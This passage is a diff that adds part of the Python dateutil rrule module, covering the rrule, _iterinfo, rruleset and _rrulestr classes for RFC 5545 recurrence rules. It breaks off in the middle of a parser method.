+ + This can lead to possibly surprising behavior when, for example, the + start date occurs at the end of the month: + + >>> from dateutil.rrule import rrule, MONTHLY + >>> from datetime import datetime + >>> start_date = datetime(2014, 12, 31) + >>> list(rrule(freq=MONTHLY, count=4, dtstart=start_date)) + ... # doctest: +NORMALIZE_WHITESPACE + [datetime.datetime(2014, 12, 31, 0, 0), + datetime.datetime(2015, 1, 31, 0, 0), + datetime.datetime(2015, 3, 31, 0, 0), + datetime.datetime(2015, 5, 31, 0, 0)] + + Additionally, it supports the following keyword arguments: + + :param dtstart: + The recurrence start. Besides being the base for the recurrence, + missing parameters in the final recurrence instances will also be + extracted from this date. If not given, datetime.now() will be used + instead. + :param interval: + The interval between each freq iteration. For example, when using + YEARLY, an interval of 2 means once every two years, but with HOURLY, + it means once every two hours. The default interval is 1. + :param wkst: + The week start day. Must be one of the MO, TU, WE constants, or an + integer, specifying the first day of the week. This will affect + recurrences based on weekly periods. The default week start is got + from calendar.firstweekday(), and may be modified by + calendar.setfirstweekday(). + :param count: + If given, this determines how many occurrences will be generated. + + .. note:: + As of version 2.5.0, the use of the keyword ``until`` in conjunction + with ``count`` is deprecated, to make sure ``dateutil`` is fully + compliant with `RFC-5545 Sec. 3.3.10 `_. Therefore, ``until`` and ``count`` + **must not** occur in the same call to ``rrule``. + :param until: + If given, this must be a datetime instance specifying the upper-bound + limit of the recurrence. The last recurrence in the rule is the greatest + datetime that is less than or equal to the value specified in the + ``until`` parameter. + + .. note:: + As of version 2.5.0, the use of the keyword ``until`` in conjunction + with ``count`` is deprecated, to make sure ``dateutil`` is fully + compliant with `RFC-5545 Sec. 3.3.10 `_. Therefore, ``until`` and ``count`` + **must not** occur in the same call to ``rrule``. + :param bysetpos: + If given, it must be either an integer, or a sequence of integers, + positive or negative. Each given integer will specify an occurrence + number, corresponding to the nth occurrence of the rule inside the + frequency period. For example, a bysetpos of -1 if combined with a + MONTHLY frequency, and a byweekday of (MO, TU, WE, TH, FR), will + result in the last work day of every month. + :param bymonth: + If given, it must be either an integer, or a sequence of integers, + meaning the months to apply the recurrence to. + :param bymonthday: + If given, it must be either an integer, or a sequence of integers, + meaning the month days to apply the recurrence to. + :param byyearday: + If given, it must be either an integer, or a sequence of integers, + meaning the year days to apply the recurrence to. + :param byeaster: + If given, it must be either an integer, or a sequence of integers, + positive or negative. Each integer will define an offset from the + Easter Sunday. Passing the offset 0 to byeaster will yield the Easter + Sunday itself. This is an extension to the RFC specification. + :param byweekno: + If given, it must be either an integer, or a sequence of integers, + meaning the week numbers to apply the recurrence to. 
Week numbers + have the meaning described in ISO8601, that is, the first week of + the year is that containing at least four days of the new year. + :param byweekday: + If given, it must be either an integer (0 == MO), a sequence of + integers, one of the weekday constants (MO, TU, etc), or a sequence + of these constants. When given, these variables will define the + weekdays where the recurrence will be applied. It's also possible to + use an argument n for the weekday instances, which will mean the nth + occurrence of this weekday in the period. For example, with MONTHLY, + or with YEARLY and BYMONTH, using FR(+1) in byweekday will specify the + first friday of the month where the recurrence happens. Notice that in + the RFC documentation, this is specified as BYDAY, but was renamed to + avoid the ambiguity of that keyword. + :param byhour: + If given, it must be either an integer, or a sequence of integers, + meaning the hours to apply the recurrence to. + :param byminute: + If given, it must be either an integer, or a sequence of integers, + meaning the minutes to apply the recurrence to. + :param bysecond: + If given, it must be either an integer, or a sequence of integers, + meaning the seconds to apply the recurrence to. + :param cache: + If given, it must be a boolean value specifying to enable or disable + caching of results. If you will use the same rrule instance multiple + times, enabling caching will improve the performance considerably. + """ + def __init__(self, freq, dtstart=None, + interval=1, wkst=None, count=None, until=None, bysetpos=None, + bymonth=None, bymonthday=None, byyearday=None, byeaster=None, + byweekno=None, byweekday=None, + byhour=None, byminute=None, bysecond=None, + cache=False): + super(rrule, self).__init__(cache) + global easter + if not dtstart: + if until and until.tzinfo: + dtstart = datetime.datetime.now(tz=until.tzinfo).replace(microsecond=0) + else: + dtstart = datetime.datetime.now().replace(microsecond=0) + elif not isinstance(dtstart, datetime.datetime): + dtstart = datetime.datetime.fromordinal(dtstart.toordinal()) + else: + dtstart = dtstart.replace(microsecond=0) + self._dtstart = dtstart + self._tzinfo = dtstart.tzinfo + self._freq = freq + self._interval = interval + self._count = count + + # Cache the original byxxx rules, if they are provided, as the _byxxx + # attributes do not necessarily map to the inputs, and this can be + # a problem in generating the strings. Only store things if they've + # been supplied (the string retrieval will just use .get()) + self._original_rule = {} + + if until and not isinstance(until, datetime.datetime): + until = datetime.datetime.fromordinal(until.toordinal()) + self._until = until + + if self._dtstart and self._until: + if (self._dtstart.tzinfo is not None) != (self._until.tzinfo is not None): + # According to RFC5545 Section 3.3.10: + # https://tools.ietf.org/html/rfc5545#section-3.3.10 + # + # > If the "DTSTART" property is specified as a date with UTC + # > time or a date with local time and time zone reference, + # > then the UNTIL rule part MUST be specified as a date with + # > UTC time. + raise ValueError( + 'RRULE UNTIL values must be specified in UTC when DTSTART ' + 'is timezone-aware' + ) + + if count is not None and until: + warn("Using both 'count' and 'until' is inconsistent with RFC 5545" + " and has been deprecated in dateutil. 
Future versions will " + "raise an error.", DeprecationWarning) + + if wkst is None: + self._wkst = calendar.firstweekday() + elif isinstance(wkst, integer_types): + self._wkst = wkst + else: + self._wkst = wkst.weekday + + if bysetpos is None: + self._bysetpos = None + elif isinstance(bysetpos, integer_types): + if bysetpos == 0 or not (-366 <= bysetpos <= 366): + raise ValueError("bysetpos must be between 1 and 366, " + "or between -366 and -1") + self._bysetpos = (bysetpos,) + else: + self._bysetpos = tuple(bysetpos) + for pos in self._bysetpos: + if pos == 0 or not (-366 <= pos <= 366): + raise ValueError("bysetpos must be between 1 and 366, " + "or between -366 and -1") + + if self._bysetpos: + self._original_rule['bysetpos'] = self._bysetpos + + if (byweekno is None and byyearday is None and bymonthday is None and + byweekday is None and byeaster is None): + if freq == YEARLY: + if bymonth is None: + bymonth = dtstart.month + self._original_rule['bymonth'] = None + bymonthday = dtstart.day + self._original_rule['bymonthday'] = None + elif freq == MONTHLY: + bymonthday = dtstart.day + self._original_rule['bymonthday'] = None + elif freq == WEEKLY: + byweekday = dtstart.weekday() + self._original_rule['byweekday'] = None + + # bymonth + if bymonth is None: + self._bymonth = None + else: + if isinstance(bymonth, integer_types): + bymonth = (bymonth,) + + self._bymonth = tuple(sorted(set(bymonth))) + + if 'bymonth' not in self._original_rule: + self._original_rule['bymonth'] = self._bymonth + + # byyearday + if byyearday is None: + self._byyearday = None + else: + if isinstance(byyearday, integer_types): + byyearday = (byyearday,) + + self._byyearday = tuple(sorted(set(byyearday))) + self._original_rule['byyearday'] = self._byyearday + + # byeaster + if byeaster is not None: + if not easter: + from dateutil import easter + if isinstance(byeaster, integer_types): + self._byeaster = (byeaster,) + else: + self._byeaster = tuple(sorted(byeaster)) + + self._original_rule['byeaster'] = self._byeaster + else: + self._byeaster = None + + # bymonthday + if bymonthday is None: + self._bymonthday = () + self._bynmonthday = () + else: + if isinstance(bymonthday, integer_types): + bymonthday = (bymonthday,) + + bymonthday = set(bymonthday) # Ensure it's unique + + self._bymonthday = tuple(sorted(x for x in bymonthday if x > 0)) + self._bynmonthday = tuple(sorted(x for x in bymonthday if x < 0)) + + # Storing positive numbers first, then negative numbers + if 'bymonthday' not in self._original_rule: + self._original_rule['bymonthday'] = tuple( + itertools.chain(self._bymonthday, self._bynmonthday)) + + # byweekno + if byweekno is None: + self._byweekno = None + else: + if isinstance(byweekno, integer_types): + byweekno = (byweekno,) + + self._byweekno = tuple(sorted(set(byweekno))) + + self._original_rule['byweekno'] = self._byweekno + + # byweekday / bynweekday + if byweekday is None: + self._byweekday = None + self._bynweekday = None + else: + # If it's one of the valid non-sequence types, convert to a + # single-element sequence before the iterator that builds the + # byweekday set. 
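+ # (plain integers and weekday instances such as MO or FR(+1) are the accepted
+ # non-sequence forms; weekday instances are recognised by their n attribute)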
+ if isinstance(byweekday, integer_types) or hasattr(byweekday, "n"): + byweekday = (byweekday,) + + self._byweekday = set() + self._bynweekday = set() + for wday in byweekday: + if isinstance(wday, integer_types): + self._byweekday.add(wday) + elif not wday.n or freq > MONTHLY: + self._byweekday.add(wday.weekday) + else: + self._bynweekday.add((wday.weekday, wday.n)) + + if not self._byweekday: + self._byweekday = None + elif not self._bynweekday: + self._bynweekday = None + + if self._byweekday is not None: + self._byweekday = tuple(sorted(self._byweekday)) + orig_byweekday = [weekday(x) for x in self._byweekday] + else: + orig_byweekday = () + + if self._bynweekday is not None: + self._bynweekday = tuple(sorted(self._bynweekday)) + orig_bynweekday = [weekday(*x) for x in self._bynweekday] + else: + orig_bynweekday = () + + if 'byweekday' not in self._original_rule: + self._original_rule['byweekday'] = tuple(itertools.chain( + orig_byweekday, orig_bynweekday)) + + # byhour + if byhour is None: + if freq < HOURLY: + self._byhour = {dtstart.hour} + else: + self._byhour = None + else: + if isinstance(byhour, integer_types): + byhour = (byhour,) + + if freq == HOURLY: + self._byhour = self.__construct_byset(start=dtstart.hour, + byxxx=byhour, + base=24) + else: + self._byhour = set(byhour) + + self._byhour = tuple(sorted(self._byhour)) + self._original_rule['byhour'] = self._byhour + + # byminute + if byminute is None: + if freq < MINUTELY: + self._byminute = {dtstart.minute} + else: + self._byminute = None + else: + if isinstance(byminute, integer_types): + byminute = (byminute,) + + if freq == MINUTELY: + self._byminute = self.__construct_byset(start=dtstart.minute, + byxxx=byminute, + base=60) + else: + self._byminute = set(byminute) + + self._byminute = tuple(sorted(self._byminute)) + self._original_rule['byminute'] = self._byminute + + # bysecond + if bysecond is None: + if freq < SECONDLY: + self._bysecond = ((dtstart.second,)) + else: + self._bysecond = None + else: + if isinstance(bysecond, integer_types): + bysecond = (bysecond,) + + self._bysecond = set(bysecond) + + if freq == SECONDLY: + self._bysecond = self.__construct_byset(start=dtstart.second, + byxxx=bysecond, + base=60) + else: + self._bysecond = set(bysecond) + + self._bysecond = tuple(sorted(self._bysecond)) + self._original_rule['bysecond'] = self._bysecond + + if self._freq >= HOURLY: + self._timeset = None + else: + self._timeset = [] + for hour in self._byhour: + for minute in self._byminute: + for second in self._bysecond: + self._timeset.append( + datetime.time(hour, minute, second, + tzinfo=self._tzinfo)) + self._timeset.sort() + self._timeset = tuple(self._timeset) + + def __str__(self): + """ + Output a string that would generate this RRULE if passed to rrulestr. + This is mostly compatible with RFC5545, except for the + dateutil-specific extension BYEASTER. 
+ """ + + output = [] + h, m, s = [None] * 3 + if self._dtstart: + output.append(self._dtstart.strftime('DTSTART:%Y%m%dT%H%M%S')) + h, m, s = self._dtstart.timetuple()[3:6] + + parts = ['FREQ=' + FREQNAMES[self._freq]] + if self._interval != 1: + parts.append('INTERVAL=' + str(self._interval)) + + if self._wkst: + parts.append('WKST=' + repr(weekday(self._wkst))[0:2]) + + if self._count is not None: + parts.append('COUNT=' + str(self._count)) + + if self._until: + parts.append(self._until.strftime('UNTIL=%Y%m%dT%H%M%S')) + + if self._original_rule.get('byweekday') is not None: + # The str() method on weekday objects doesn't generate + # RFC5545-compliant strings, so we should modify that. + original_rule = dict(self._original_rule) + wday_strings = [] + for wday in original_rule['byweekday']: + if wday.n: + wday_strings.append('{n:+d}{wday}'.format( + n=wday.n, + wday=repr(wday)[0:2])) + else: + wday_strings.append(repr(wday)) + + original_rule['byweekday'] = wday_strings + else: + original_rule = self._original_rule + + partfmt = '{name}={vals}' + for name, key in [('BYSETPOS', 'bysetpos'), + ('BYMONTH', 'bymonth'), + ('BYMONTHDAY', 'bymonthday'), + ('BYYEARDAY', 'byyearday'), + ('BYWEEKNO', 'byweekno'), + ('BYDAY', 'byweekday'), + ('BYHOUR', 'byhour'), + ('BYMINUTE', 'byminute'), + ('BYSECOND', 'bysecond'), + ('BYEASTER', 'byeaster')]: + value = original_rule.get(key) + if value: + parts.append(partfmt.format(name=name, vals=(','.join(str(v) + for v in value)))) + + output.append('RRULE:' + ';'.join(parts)) + return '\n'.join(output) + + def replace(self, **kwargs): + """Return new rrule with same attributes except for those attributes given new + values by whichever keyword arguments are specified.""" + new_kwargs = {"interval": self._interval, + "count": self._count, + "dtstart": self._dtstart, + "freq": self._freq, + "until": self._until, + "wkst": self._wkst, + "cache": False if self._cache is None else True } + new_kwargs.update(self._original_rule) + new_kwargs.update(kwargs) + return rrule(**new_kwargs) + + def _iter(self): + year, month, day, hour, minute, second, weekday, yearday, _ = \ + self._dtstart.timetuple() + + # Some local variables to speed things up a bit + freq = self._freq + interval = self._interval + wkst = self._wkst + until = self._until + bymonth = self._bymonth + byweekno = self._byweekno + byyearday = self._byyearday + byweekday = self._byweekday + byeaster = self._byeaster + bymonthday = self._bymonthday + bynmonthday = self._bynmonthday + bysetpos = self._bysetpos + byhour = self._byhour + byminute = self._byminute + bysecond = self._bysecond + + ii = _iterinfo(self) + ii.rebuild(year, month) + + getdayset = {YEARLY: ii.ydayset, + MONTHLY: ii.mdayset, + WEEKLY: ii.wdayset, + DAILY: ii.ddayset, + HOURLY: ii.ddayset, + MINUTELY: ii.ddayset, + SECONDLY: ii.ddayset}[freq] + + if freq < HOURLY: + timeset = self._timeset + else: + gettimeset = {HOURLY: ii.htimeset, + MINUTELY: ii.mtimeset, + SECONDLY: ii.stimeset}[freq] + if ((freq >= HOURLY and + self._byhour and hour not in self._byhour) or + (freq >= MINUTELY and + self._byminute and minute not in self._byminute) or + (freq >= SECONDLY and + self._bysecond and second not in self._bysecond)): + timeset = () + else: + timeset = gettimeset(hour, minute, second) + + total = 0 + count = self._count + while True: + # Get dayset with the right frequency + dayset, start, end = getdayset(year, month, day) + + # Do the "hard" work ;-) + filtered = False + for i in dayset[start:end]: + if ((bymonth and ii.mmask[i] not in 
bymonth) or + (byweekno and not ii.wnomask[i]) or + (byweekday and ii.wdaymask[i] not in byweekday) or + (ii.nwdaymask and not ii.nwdaymask[i]) or + (byeaster and not ii.eastermask[i]) or + ((bymonthday or bynmonthday) and + ii.mdaymask[i] not in bymonthday and + ii.nmdaymask[i] not in bynmonthday) or + (byyearday and + ((i < ii.yearlen and i+1 not in byyearday and + -ii.yearlen+i not in byyearday) or + (i >= ii.yearlen and i+1-ii.yearlen not in byyearday and + -ii.nextyearlen+i-ii.yearlen not in byyearday)))): + dayset[i] = None + filtered = True + + # Output results + if bysetpos and timeset: + poslist = [] + for pos in bysetpos: + if pos < 0: + daypos, timepos = divmod(pos, len(timeset)) + else: + daypos, timepos = divmod(pos-1, len(timeset)) + try: + i = [x for x in dayset[start:end] + if x is not None][daypos] + time = timeset[timepos] + except IndexError: + pass + else: + date = datetime.date.fromordinal(ii.yearordinal+i) + res = datetime.datetime.combine(date, time) + if res not in poslist: + poslist.append(res) + poslist.sort() + for res in poslist: + if until and res > until: + self._len = total + return + elif res >= self._dtstart: + if count is not None: + count -= 1 + if count < 0: + self._len = total + return + total += 1 + yield res + else: + for i in dayset[start:end]: + if i is not None: + date = datetime.date.fromordinal(ii.yearordinal + i) + for time in timeset: + res = datetime.datetime.combine(date, time) + if until and res > until: + self._len = total + return + elif res >= self._dtstart: + if count is not None: + count -= 1 + if count < 0: + self._len = total + return + + total += 1 + yield res + + # Handle frequency and interval + fixday = False + if freq == YEARLY: + year += interval + if year > datetime.MAXYEAR: + self._len = total + return + ii.rebuild(year, month) + elif freq == MONTHLY: + month += interval + if month > 12: + div, mod = divmod(month, 12) + month = mod + year += div + if month == 0: + month = 12 + year -= 1 + if year > datetime.MAXYEAR: + self._len = total + return + ii.rebuild(year, month) + elif freq == WEEKLY: + if wkst > weekday: + day += -(weekday+1+(6-wkst))+self._interval*7 + else: + day += -(weekday-wkst)+self._interval*7 + weekday = wkst + fixday = True + elif freq == DAILY: + day += interval + fixday = True + elif freq == HOURLY: + if filtered: + # Jump to one iteration before next day + hour += ((23-hour)//interval)*interval + + if byhour: + ndays, hour = self.__mod_distance(value=hour, + byxxx=self._byhour, + base=24) + else: + ndays, hour = divmod(hour+interval, 24) + + if ndays: + day += ndays + fixday = True + + timeset = gettimeset(hour, minute, second) + elif freq == MINUTELY: + if filtered: + # Jump to one iteration before next day + minute += ((1439-(hour*60+minute))//interval)*interval + + valid = False + rep_rate = (24*60) + for j in range(rep_rate // gcd(interval, rep_rate)): + if byminute: + nhours, minute = \ + self.__mod_distance(value=minute, + byxxx=self._byminute, + base=60) + else: + nhours, minute = divmod(minute+interval, 60) + + div, hour = divmod(hour+nhours, 24) + if div: + day += div + fixday = True + filtered = False + + if not byhour or hour in byhour: + valid = True + break + + if not valid: + raise ValueError('Invalid combination of interval and ' + + 'byhour resulting in empty rule.') + + timeset = gettimeset(hour, minute, second) + elif freq == SECONDLY: + if filtered: + # Jump to one iteration before next day + second += (((86399 - (hour * 3600 + minute * 60 + second)) + // interval) * interval) + + 
rep_rate = (24 * 3600) + valid = False + for j in range(0, rep_rate // gcd(interval, rep_rate)): + if bysecond: + nminutes, second = \ + self.__mod_distance(value=second, + byxxx=self._bysecond, + base=60) + else: + nminutes, second = divmod(second+interval, 60) + + div, minute = divmod(minute+nminutes, 60) + if div: + hour += div + div, hour = divmod(hour, 24) + if div: + day += div + fixday = True + + if ((not byhour or hour in byhour) and + (not byminute or minute in byminute) and + (not bysecond or second in bysecond)): + valid = True + break + + if not valid: + raise ValueError('Invalid combination of interval, ' + + 'byhour and byminute resulting in empty' + + ' rule.') + + timeset = gettimeset(hour, minute, second) + + if fixday and day > 28: + daysinmonth = calendar.monthrange(year, month)[1] + if day > daysinmonth: + while day > daysinmonth: + day -= daysinmonth + month += 1 + if month == 13: + month = 1 + year += 1 + if year > datetime.MAXYEAR: + self._len = total + return + daysinmonth = calendar.monthrange(year, month)[1] + ii.rebuild(year, month) + + def __construct_byset(self, start, byxxx, base): + """ + If a `BYXXX` sequence is passed to the constructor at the same level as + `FREQ` (e.g. `FREQ=HOURLY,BYHOUR={2,4,7},INTERVAL=3`), there are some + specifications which cannot be reached given some starting conditions. + + This occurs whenever the interval is not coprime with the base of a + given unit and the difference between the starting position and the + ending position is not coprime with the greatest common denominator + between the interval and the base. For example, with a FREQ of hourly + starting at 17:00 and an interval of 4, the only valid values for + BYHOUR would be {21, 1, 5, 9, 13, 17}, because 4 and 24 are not + coprime. + + :param start: + Specifies the starting position. + :param byxxx: + An iterable containing the list of allowed values. + :param base: + The largest allowable value for the specified frequency (e.g. + 24 hours, 60 minutes). + + This does not preserve the type of the iterable, returning a set, since + the values should be unique and the order is irrelevant, this will + speed up later lookups. + + In the event of an empty set, raises a :exception:`ValueError`, as this + results in an empty rrule. + """ + + cset = set() + + # Support a single byxxx value. + if isinstance(byxxx, integer_types): + byxxx = (byxxx, ) + + for num in byxxx: + i_gcd = gcd(self._interval, base) + # Use divmod rather than % because we need to wrap negative nums. + if i_gcd == 1 or divmod(num - start, i_gcd)[1] == 0: + cset.add(num) + + if len(cset) == 0: + raise ValueError("Invalid rrule byxxx generates an empty set.") + + return cset + + def __mod_distance(self, value, byxxx, base): + """ + Calculates the next value in a sequence where the `FREQ` parameter is + specified along with a `BYXXX` parameter at the same "level" + (e.g. `HOURLY` specified with `BYHOUR`). + + :param value: + The old value of the component. + :param byxxx: + The `BYXXX` set, which should have been generated by + `rrule._construct_byset`, or something else which checks that a + valid rule is present. + :param base: + The largest allowable value for the specified frequency (e.g. + 24 hours, 60 minutes). + + If a valid value is not found after `base` iterations (the maximum + number before the sequence would start to repeat), this raises a + :exception:`ValueError`, as no valid values were found. 
+ + This returns a tuple of `divmod(n*interval, base)`, where `n` is the + smallest number of `interval` repetitions until the next specified + value in `byxxx` is found. + """ + accumulator = 0 + for ii in range(1, base + 1): + # Using divmod() over % to account for negative intervals + div, value = divmod(value + self._interval, base) + accumulator += div + if value in byxxx: + return (accumulator, value) + + +class _iterinfo(object): + __slots__ = ["rrule", "lastyear", "lastmonth", + "yearlen", "nextyearlen", "yearordinal", "yearweekday", + "mmask", "mrange", "mdaymask", "nmdaymask", + "wdaymask", "wnomask", "nwdaymask", "eastermask"] + + def __init__(self, rrule): + for attr in self.__slots__: + setattr(self, attr, None) + self.rrule = rrule + + def rebuild(self, year, month): + # Every mask is 7 days longer to handle cross-year weekly periods. + rr = self.rrule + if year != self.lastyear: + self.yearlen = 365 + calendar.isleap(year) + self.nextyearlen = 365 + calendar.isleap(year + 1) + firstyday = datetime.date(year, 1, 1) + self.yearordinal = firstyday.toordinal() + self.yearweekday = firstyday.weekday() + + wday = datetime.date(year, 1, 1).weekday() + if self.yearlen == 365: + self.mmask = M365MASK + self.mdaymask = MDAY365MASK + self.nmdaymask = NMDAY365MASK + self.wdaymask = WDAYMASK[wday:] + self.mrange = M365RANGE + else: + self.mmask = M366MASK + self.mdaymask = MDAY366MASK + self.nmdaymask = NMDAY366MASK + self.wdaymask = WDAYMASK[wday:] + self.mrange = M366RANGE + + if not rr._byweekno: + self.wnomask = None + else: + self.wnomask = [0]*(self.yearlen+7) + # no1wkst = firstwkst = self.wdaymask.index(rr._wkst) + no1wkst = firstwkst = (7-self.yearweekday+rr._wkst) % 7 + if no1wkst >= 4: + no1wkst = 0 + # Number of days in the year, plus the days we got + # from last year. + wyearlen = self.yearlen+(self.yearweekday-rr._wkst) % 7 + else: + # Number of days in the year, minus the days we + # left in last year. + wyearlen = self.yearlen-no1wkst + div, mod = divmod(wyearlen, 7) + numweeks = div+mod//4 + for n in rr._byweekno: + if n < 0: + n += numweeks+1 + if not (0 < n <= numweeks): + continue + if n > 1: + i = no1wkst+(n-1)*7 + if no1wkst != firstwkst: + i -= 7-firstwkst + else: + i = no1wkst + for j in range(7): + self.wnomask[i] = 1 + i += 1 + if self.wdaymask[i] == rr._wkst: + break + if 1 in rr._byweekno: + # Check week number 1 of next year as well + # TODO: Check -numweeks for next year. + i = no1wkst+numweeks*7 + if no1wkst != firstwkst: + i -= 7-firstwkst + if i < self.yearlen: + # If week starts in next year, we + # don't care about it. + for j in range(7): + self.wnomask[i] = 1 + i += 1 + if self.wdaymask[i] == rr._wkst: + break + if no1wkst: + # Check last week number of last year as + # well. If no1wkst is 0, either the year + # started on week start, or week number 1 + # got days from last year, so there are no + # days from last year's last week number in + # this year. 
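+ # (roughly: work out last year's final week number, or take -1 literally, and if
+ # that week was requested mark the leading days of this year that still belong to it)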
+ if -1 not in rr._byweekno: + lyearweekday = datetime.date(year-1, 1, 1).weekday() + lno1wkst = (7-lyearweekday+rr._wkst) % 7 + lyearlen = 365+calendar.isleap(year-1) + if lno1wkst >= 4: + lno1wkst = 0 + lnumweeks = 52+(lyearlen + + (lyearweekday-rr._wkst) % 7) % 7//4 + else: + lnumweeks = 52+(self.yearlen-no1wkst) % 7//4 + else: + lnumweeks = -1 + if lnumweeks in rr._byweekno: + for i in range(no1wkst): + self.wnomask[i] = 1 + + if (rr._bynweekday and (month != self.lastmonth or + year != self.lastyear)): + ranges = [] + if rr._freq == YEARLY: + if rr._bymonth: + for month in rr._bymonth: + ranges.append(self.mrange[month-1:month+1]) + else: + ranges = [(0, self.yearlen)] + elif rr._freq == MONTHLY: + ranges = [self.mrange[month-1:month+1]] + if ranges: + # Weekly frequency won't get here, so we may not + # care about cross-year weekly periods. + self.nwdaymask = [0]*self.yearlen + for first, last in ranges: + last -= 1 + for wday, n in rr._bynweekday: + if n < 0: + i = last+(n+1)*7 + i -= (self.wdaymask[i]-wday) % 7 + else: + i = first+(n-1)*7 + i += (7-self.wdaymask[i]+wday) % 7 + if first <= i <= last: + self.nwdaymask[i] = 1 + + if rr._byeaster: + self.eastermask = [0]*(self.yearlen+7) + eyday = easter.easter(year).toordinal()-self.yearordinal + for offset in rr._byeaster: + self.eastermask[eyday+offset] = 1 + + self.lastyear = year + self.lastmonth = month + + def ydayset(self, year, month, day): + return list(range(self.yearlen)), 0, self.yearlen + + def mdayset(self, year, month, day): + dset = [None]*self.yearlen + start, end = self.mrange[month-1:month+1] + for i in range(start, end): + dset[i] = i + return dset, start, end + + def wdayset(self, year, month, day): + # We need to handle cross-year weeks here. + dset = [None]*(self.yearlen+7) + i = datetime.date(year, month, day).toordinal()-self.yearordinal + start = i + for j in range(7): + dset[i] = i + i += 1 + # if (not (0 <= i < self.yearlen) or + # self.wdaymask[i] == self.rrule._wkst): + # This will cross the year boundary, if necessary. + if self.wdaymask[i] == self.rrule._wkst: + break + return dset, start, i + + def ddayset(self, year, month, day): + dset = [None] * self.yearlen + i = datetime.date(year, month, day).toordinal() - self.yearordinal + dset[i] = i + return dset, i, i + 1 + + def htimeset(self, hour, minute, second): + tset = [] + rr = self.rrule + for minute in rr._byminute: + for second in rr._bysecond: + tset.append(datetime.time(hour, minute, second, + tzinfo=rr._tzinfo)) + tset.sort() + return tset + + def mtimeset(self, hour, minute, second): + tset = [] + rr = self.rrule + for second in rr._bysecond: + tset.append(datetime.time(hour, minute, second, tzinfo=rr._tzinfo)) + tset.sort() + return tset + + def stimeset(self, hour, minute, second): + return (datetime.time(hour, minute, second, + tzinfo=self.rrule._tzinfo),) + + +class rruleset(rrulebase): + """ The rruleset type allows more complex recurrence setups, mixing + multiple rules, dates, exclusion rules, and exclusion dates. The type + constructor takes the following keyword arguments: + + :param cache: If True, caching of results will be enabled, improving + performance of multiple queries considerably. 
""" + + class _genitem(object): + def __init__(self, genlist, gen): + try: + self.dt = advance_iterator(gen) + genlist.append(self) + except StopIteration: + pass + self.genlist = genlist + self.gen = gen + + def __next__(self): + try: + self.dt = advance_iterator(self.gen) + except StopIteration: + if self.genlist[0] is self: + heapq.heappop(self.genlist) + else: + self.genlist.remove(self) + heapq.heapify(self.genlist) + + next = __next__ + + def __lt__(self, other): + return self.dt < other.dt + + def __gt__(self, other): + return self.dt > other.dt + + def __eq__(self, other): + return self.dt == other.dt + + def __ne__(self, other): + return self.dt != other.dt + + def __init__(self, cache=False): + super(rruleset, self).__init__(cache) + self._rrule = [] + self._rdate = [] + self._exrule = [] + self._exdate = [] + + @_invalidates_cache + def rrule(self, rrule): + """ Include the given :py:class:`rrule` instance in the recurrence set + generation. """ + self._rrule.append(rrule) + + @_invalidates_cache + def rdate(self, rdate): + """ Include the given :py:class:`datetime` instance in the recurrence + set generation. """ + self._rdate.append(rdate) + + @_invalidates_cache + def exrule(self, exrule): + """ Include the given rrule instance in the recurrence set exclusion + list. Dates which are part of the given recurrence rules will not + be generated, even if some inclusive rrule or rdate matches them. + """ + self._exrule.append(exrule) + + @_invalidates_cache + def exdate(self, exdate): + """ Include the given datetime instance in the recurrence set + exclusion list. Dates included that way will not be generated, + even if some inclusive rrule or rdate matches them. """ + self._exdate.append(exdate) + + def _iter(self): + rlist = [] + self._rdate.sort() + self._genitem(rlist, iter(self._rdate)) + for gen in [iter(x) for x in self._rrule]: + self._genitem(rlist, gen) + exlist = [] + self._exdate.sort() + self._genitem(exlist, iter(self._exdate)) + for gen in [iter(x) for x in self._exrule]: + self._genitem(exlist, gen) + lastdt = None + total = 0 + heapq.heapify(rlist) + heapq.heapify(exlist) + while rlist: + ritem = rlist[0] + if not lastdt or lastdt != ritem.dt: + while exlist and exlist[0] < ritem: + exitem = exlist[0] + advance_iterator(exitem) + if exlist and exlist[0] is exitem: + heapq.heapreplace(exlist, exitem) + if not exlist or ritem != exlist[0]: + total += 1 + yield ritem.dt + lastdt = ritem.dt + advance_iterator(ritem) + if rlist and rlist[0] is ritem: + heapq.heapreplace(rlist, ritem) + self._len = total + + + + +class _rrulestr(object): + """ Parses a string representation of a recurrence rule or set of + recurrence rules. + + :param s: + Required, a string defining one or more recurrence rules. + + :param dtstart: + If given, used as the default recurrence start if not specified in the + rule string. + + :param cache: + If set ``True`` caching of results will be enabled, improving + performance of multiple queries considerably. + + :param unfold: + If set ``True`` indicates that a rule string is split over more + than one line and should be joined before processing. + + :param forceset: + If set ``True`` forces a :class:`dateutil.rrule.rruleset` to + be returned. + + :param compatible: + If set ``True`` forces ``unfold`` and ``forceset`` to be ``True``. + + :param ignoretz: + If set ``True``, time zones in parsed strings are ignored and a naive + :class:`datetime.datetime` object is returned. 
+ + :param tzids: + If given, a callable or mapping used to retrieve a + :class:`datetime.tzinfo` from a string representation. + Defaults to :func:`dateutil.tz.gettz`. + + :param tzinfos: + Additional time zone names / aliases which may be present in a string + representation. See :func:`dateutil.parser.parse` for more + information. + + :return: + Returns a :class:`dateutil.rrule.rruleset` or + :class:`dateutil.rrule.rrule` + """ + + _freq_map = {"YEARLY": YEARLY, + "MONTHLY": MONTHLY, + "WEEKLY": WEEKLY, + "DAILY": DAILY, + "HOURLY": HOURLY, + "MINUTELY": MINUTELY, + "SECONDLY": SECONDLY} + + _weekday_map = {"MO": 0, "TU": 1, "WE": 2, "TH": 3, + "FR": 4, "SA": 5, "SU": 6} + + def _handle_int(self, rrkwargs, name, value, **kwargs): + rrkwargs[name.lower()] = int(value) + + def _handle_int_list(self, rrkwargs, name, value, **kwargs): + rrkwargs[name.lower()] = [int(x) for x in value.split(',')] + + _handle_INTERVAL = _handle_int + _handle_COUNT = _handle_int + _handle_BYSETPOS = _handle_int_list + _handle_BYMONTH = _handle_int_list + _handle_BYMONTHDAY = _handle_int_list + _handle_BYYEARDAY = _handle_int_list + _handle_BYEASTER = _handle_int_list + _handle_BYWEEKNO = _handle_int_list + _handle_BYHOUR = _handle_int_list + _handle_BYMINUTE = _handle_int_list + _handle_BYSECOND = _handle_int_list + + def _handle_FREQ(self, rrkwargs, name, value, **kwargs): + rrkwargs["freq"] = self._freq_map[value] + + def _handle_UNTIL(self, rrkwargs, name, value, **kwargs): + global parser + if not parser: + from dateutil import parser + try: + rrkwargs["until"] = parser.parse(value, + ignoretz=kwargs.get("ignoretz"), + tzinfos=kwargs.get("tzinfos")) + except ValueError: + raise ValueError("invalid until date") + + def _handle_WKST(self, rrkwargs, name, value, **kwargs): + rrkwargs["wkst"] = self._weekday_map[value] + + def _handle_BYWEEKDAY(self, rrkwargs, 